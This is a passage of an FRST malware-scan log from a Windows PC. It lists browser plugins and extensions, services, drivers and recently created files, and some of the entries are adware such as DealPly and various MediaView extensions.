FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-06-07] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-05-11] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-22] (Adobe Systems)
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\User\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll No File
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\User\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2013-10-03] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @Skype Limited.com/Facebook Video Calling Plugin -> C:\Users\User\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll No File
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\User\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2013-10-03] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1005-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF Plugin HKU\S-1-5-21-1557550123-2840590655-2789666575-1006-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @lightspark.github.com/Lightspark;version=1 -> C:\Program Files (x86)\Lightspark 0.5.3-git\nplightsparkplugin.dll [2011-12-01] ( )
FF user.js: detected! => C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\73ou9irr.default-1393877900780\user.js [2015-02-12]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npBitCometAgent.dll [2010-02-21] (BitComet)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2013-05-11] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2014-10-21] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2014-10-21] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2014-10-21] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll [2014-10-21] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll [2014-10-21] (Apple Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\adawaretb.xml [2014-01-18]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\wtu-secure-search.xml [2014-09-03]
FF Extension: Adblock Plus - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\73ou9irr.default-1393877900780\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-09-08]
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2012-05-08]
FF HKLM-x32\...\Firefox\Extensions: [{FFB96CC1-7EB3-449D-B827-DB661701C6BB}] - C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker
FF HKLM-x32\...\Firefox\Extensions: [ext@flash-Enhancer.com] - C:\Program Files (x86)\AmiExt\flashEnhancer\ff
FF HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3

Chrome:
=======
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (AdBlock) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-03-23]
CHR Extension: (Bookmark Manager) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-05-24]
CHR Extension: (Flamite) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\kgobopgcnapcnblkpelgjjblnjjpgejk [2015-05-24]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-12]
CHR Extension: (Google Wallet) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-23]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gaiilaahiahdejapggenmdmafpmbipje] - C:\Program Files (x86)\DealPly\DealPly.crx [Not Found]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kdfbddbdpnahdahmamlolacimfdbeckk] - C:\Users\User\AppData\Local\CRE\kdfbddbdpnahdahmamlolacimfdbeckk.crx [2013-04-10]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [klibnahbojhkanfgaglnlalfkgpcppfi] - C:\Users\User\AppData\Local\CRE\klibnahbojhkanfgaglnlalfkgpcppfi.crx [2013-04-18]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lalblocoaegmicimmklamjmfpdmpenaf] - C:\Users\User\AppData\Local\CRE\lalblocoaegmicimmklamjmfpdmpenaf.crx [Not Found]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [gaiilaahiahdejapggenmdmafpmbipje] - C:\Program Files (x86)\DealPly\DealPly.crx [Not Found]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kdfbddbdpnahdahmamlolacimfdbeckk] - C:\Users\User\AppData\Local\CRE\kdfbddbdpnahdahmamlolacimfdbeckk.crx [2013-04-10]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [klibnahbojhkanfgaglnlalfkgpcppfi] - C:\Users\User\AppData\Local\CRE\klibnahbojhkanfgaglnlalfkgpcppfi.crx [2013-04-18]
CHR HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lalblocoaegmicimmklamjmfpdmpenaf] - C:\Users\User\AppData\Local\CRE\lalblocoaegmicimmklamjmfpdmpenaf.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [didepmgifgpiahohnelodedkglcldncm] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha8285\ch\MediaViewV1alpha8285.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [dkpgpalmlhhcakipgodbonbgjjdmbjnl] - C:\Program Files (x86)\MediaViewerV1\MediaViewerV1alpha1423\ch\MediaViewerV1alpha1423.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [fcbpkmeonnhlhobiihbochcmiioicaca] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha3658\ch\MediaViewV1alpha3658.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [gaiilaahiahdejapggenmdmafpmbipje] - C:\Program Files (x86)\DealPly\DealPly.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [hnghlghflihkfiopikcjmaiajgbieegb] - C:\Program Files (x86)\VideoPlayerV3\VideoPlayerV3beta573\ch\VideoPlayerV3beta573.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [kdfbddbdpnahdahmamlolacimfdbeckk] - C:\Users\User\AppData\Local\CRE\kdfbddbdpnahdahmamlolacimfdbeckk.crx [2013-04-10]
CHR HKLM-x32\...\Chrome\Extension: [klibnahbojhkanfgaglnlalfkgpcppfi] - C:\Users\User\AppData\Local\CRE\klibnahbojhkanfgaglnlalfkgpcppfi.crx [2013-04-18]
CHR HKLM-x32\...\Chrome\Extension: [lalblocoaegmicimmklamjmfpdmpenaf] - C:\Users\User\AppData\Local\CRE\lalblocoaegmicimmklamjmfpdmpenaf.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [oejkcgajlodefenbbjdnaiahmbnnoole] - C:\Program Files (x86)\Lavasoft\AdAware SecureSearch Toolbar\chrome-newtab-search.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [pldkcbogceafpgblcfljhbbkkjindpcj] - C:\Program Files (x86)\MediaWatchV1\MediaWatchV1home140\ch\MediaWatchV1home140.crx [Not Found]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ABBYY.Licensing.FineReader.Sprint.9.0; C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [759048 2009-05-14] (ABBYY)
S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2013-06-11] (Adobe Systems) [File not signed]
R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1526936 2015-06-16] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3461072 2015-06-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [312816 2015-06-16] (AVG Technologies CZ, s.r.o.)
S3 fussvc; C:\Program Files (x86)\Windows Kits\8.0\App Certification Kit\fussvc.exe [139776 2012-07-25] (Microsoft Corporation) [File not signed]
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1152656 2015-06-03] (NVIDIA Corporation)
R3 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [249344 2009-09-20] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-09-20] (Hewlett-Packard Co.) [File not signed]
R2 LavasoftAdAwareService11; C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe [706864 2014-06-03] ()
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-04-14] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-04-14] (Malwarebytes Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [File not signed]
R2 Norton PC Checkup Application Launcher; C:\Program Files (x86)\Norton PC Checkup 3.0\SymcPCCULaunchSvc.exe [132504 2013-03-17] (Symantec Corporation)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [4063280 2011-06-07] (INCA Internet Co., Ltd.) [File not signed]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1893008 2015-06-03] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [23007376 2015-06-03] (NVIDIA Corporation)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe [126392 2011-05-03] (Symantec Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [File not signed]
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2013-04-20] ()
S3 Te.Service; C:\Program Files (x86)\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe [126976 2012-07-25] (Microsoft Corporation) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S3 WPDBusEnum; C:\Windows\system32\wpdbusenum.dll [117248 2010-11-20] (Microsoft Corporation) [File not signed]
S3 xsherlock; C:\Windows\SysWOW64\xsherlock.xem [674912 2012-09-01] (Wellbia.com Co., Ltd.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13368 2009-04-06] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [67552 2015-04-14] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [287200 2015-05-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [253408 2015-05-12] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [256992 2015-04-15] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [224224 2015-05-12] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [281568 2015-05-12] (AVG Technologies CZ, s.r.o.)
S3 dump_wmimmc; No ImagePath
S3 hwmobile; C:\Windows\System32\DRIVERS\hwusbser.sys [122496 2010-08-19] (HUAWEI Incorporated)
S3 LVPr2M64; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30304 2010-05-07] ()
S3 LVPr2Mon; C:\Windows\System32\DRIVERS\LVPr2M64.sys [30304 2010-05-07] ()
S3 MAUSBFASTTRACKULTRA; C:\Windows\System32\DRIVERS\MAudioFastTrackUltra.sys [197424 2011-01-11] (Avid Technology, Inc.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-04-14] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [136408 2015-06-28] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-04-14] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [15416 2009-07-15] ()
S3 NPPTNT2; C:\Windows\SysWOW64\npptNT2.sys [4682 2004-12-30] (INCA Internet Co., Ltd.) [File not signed]
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2015-06-03] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [46768 2015-05-18] (NVIDIA Corporation)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [28416 2008-04-16] (Research In Motion Limited)
S1 SCDEmu; No ImagePath
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [386680 2014-06-19] (Duplex Secure Ltd.)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2014-03-03] ()
S3 Synth3dVsc; No ImagePath
S3 TesSafe; C:\Windows\system32\TesSafe.sys [969696 2014-04-27] (TENCENT)
S3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [389240 2014-04-22] (BitDefender S.R.L.)
S3 tsusbhub; No ImagePath
S3 VGPU; No ImagePath
S3 vtany; No ImagePath
S3 X6va005; No ImagePath
S3 X6va012; No ImagePath
U3 az2rivpn; No ImagePath
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-06-28 11:38 - 2015-06-28 11:38 - 00036844 _____ C:\Users\User\Downloads\FRST.txt
2015-06-28 11:37 - 2015-06-28 11:38 - 00000000 ____D C:\FRST
2015-06-28 11:36 - 2015-06-28 11:37 - 02112512 _____ (Farbar) C:\Users\User\Downloads\FRST64.exe
2015-06-28 11:36 - 2015-06-28 11:36 - 01636352 _____ (Farbar) C:\Users\User\Downloads\FRST(1).exe
2015-06-28 11:35 - 2015-06-28 11:35 - 01636352 _____ (Farbar) C:\Users\User\Downloads\FRST.exe
2015-06-28 09:26 - 2015-06-28 09:26 - 00001106 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-06-28 09:26 - 2015-06-28 09:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-06-28 09:26 - 2015-06-28 09:26 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-06-28 09:26 - 2015-04-14 09:37 - 00107736 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-06-28 09:26 - 2015-04-14 09:37 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-06-28 09:26 - 2015-04-14 09:37 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-06-28 09:24 - 2015-06-28 09:24 - 21546080 _____ (Malwarebytes Corporation ) C:\Users\User\Downloads\mbam-setup-2.1.6.1022.exe
2015-06-28 09:22 - 2015-06-28 09:22 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\User\Downloads\revosetup.exe
2015-06-28 09:22 - 2015-06-28 09:22 - 00001268 _____ C:\Users\User\Desktop\Revo Uninstaller.lnk
2015-06-28 09:22 - 2015-06-28 09:22 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2015-06-27 23:22 - 2015-06-28 08:01 - 00000338 _____ C:\Users\User\Desktop\avgrep.txt
2015-06-27 21:14 - 2015-06-28 11:09 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2015-06-27 21:14 - 2015-06-27 21:14 - 00002864 _____ C:\Windows\System32\Tasks\ybzhzak
2015-06-23 11:19 - 2015-06-23 11:23 - 00008561 _____ C:\Users\User\Documents\dfo security code dnf.odt
2015-06-22 12:57 - 2015-06-22 12:57 - 00000000 ____D C:\Program Files\Common Files\AV
2015-06-21 16:55 - 2015-06-21 16:55 - 45113344 _____ C:\Users\User\Downloads\AdbeRdrUpd11010.msp
2015-06-20 09:04 - 2015-06-20 09:04 - 00008748 _____ C:\Users\User\Documents\Dwayne algonquin OAN.odt
2015-06-20 06:29 - 2015-05-18 23:29 - 00046768 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2015-06-20 06:29 - 2015-05-18 23:14 - 00057520 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2015-06-20 06:25 - 2015-06-20 06:29 - 00000000 ____D C:\ProgramData\Oracle
2015-06-19 10:51 - 2015-06-24 05:49 - 00000000 ____D C:\Users\User\Documents\Candis Cones
2015-06-15 20:05 - 2015-06-15 20:05 - 00000000 ____D C:\Users\User\AppData\Local\{8E71BBF1-8D31-4DFB-97BD-38E551B177FF}
2015-06-12 17:12 - 2015-06-12 23:15 - 00066333 _____ C:\Users\User\Documents\exercise science ufc.odt
2015-06-10 10:17 - 2015-05-25 13:08 - 03206144 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-06-10 10:17 - 2015-05-08 23:27 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2015-06-10 10:17 - 2015-05-08 23:27 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2015-06-10 10:17 - 2015-05-08 23:27 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2015-06-10 10:17 - 2015-05-08 23:27 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2015-06-10 10:17 - 2015-05-08 23:26 - 01162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-06-10 10:17 - 2015-05-08 23:26 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2015-06-10 10:17 - 2015-05-08 23:26 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-06-10 10:17 - 2015-05-08 23:25 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2015-06-10 10:17 - 2015-05-08 23:20 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:13 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2015-06-10 10:17 - 2015-05-08 23:13 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2015-06-10 10:17 - 2015-05-08 23:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2015-06-10 10:17 - 2015-05-08 23:12 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2015-06-10 10:17 - 2015-05-08 23:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2015-06-10 10:17 - 2015-05-08 23:08 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
